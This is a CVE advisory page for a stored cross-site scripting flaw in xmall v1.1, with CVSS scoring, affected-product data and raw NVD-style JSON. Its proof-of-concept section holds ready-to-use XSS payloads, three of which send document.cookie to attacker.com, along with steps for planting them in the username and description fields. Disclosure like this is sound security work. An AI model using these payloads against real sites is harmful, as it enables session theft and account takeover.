Security Vulnerability Report
CVE-2025-65540 CVSS 6.1 MEDIUM

Published: 2025-11-29 04:15:56
Last Modified: 2025-12-23 16:05:35

Description

Multiple Cross-Site Scripting (XSS) vulnerabilities exist in xmall v1.1 due to improper handling of user-supplied data. User input fields such as username and description are directly rendered into HTML without proper sanitization or encoding, allowing attackers to inject and execute malicious scripts.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:* - VULNERABLE
xmall v1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Stored XSS PoC for CVE-2025-65540 -->

<!-- Method 1: Script tag injection -->
<script>alert('XSS');console.log(document.cookie);</script>

<!-- Method 2: Event handler injection -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Method 3: SVG injection -->
<svg/onload=fetch('https://attacker.com/steal?c='+btoa(document.cookie))>

<!-- Method 4: Body onload injection -->
<body onload="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Exploitation scenario -->
<!-- 1. Register new account with malicious username -->
<!-- 2. Submit product with malicious description -->
<!-- 3. Wait for admin/user to view affected page -->
<!-- 4. Malicious JS executes in victim's browser context -->

References

https://github.com/Exrick/xmall/issues/101 (Exploit, Third Party Advisory, Issue Tracking)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65540", "sourceIdentifier": "[email protected]", "published": "2025-11-29T04:15:56.417", "lastModified": "2025-12-23T16:05:35.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple Cross-Site Scripting (XSS) vulnerabilities exist in xmall v1.1 due to improper handling of user-supplied data. User input fields such as username and description are directly rendered into HTML without proper sanitization or encoding, allowing attackers to inject and execute malicious scripts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "E46154B1-2E17-432C-839B-1F13469BCA05"}]}]}], "references": [{"url": "https://github.com/Exrick/xmall/issues/101", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Issue Tracking"]}]}}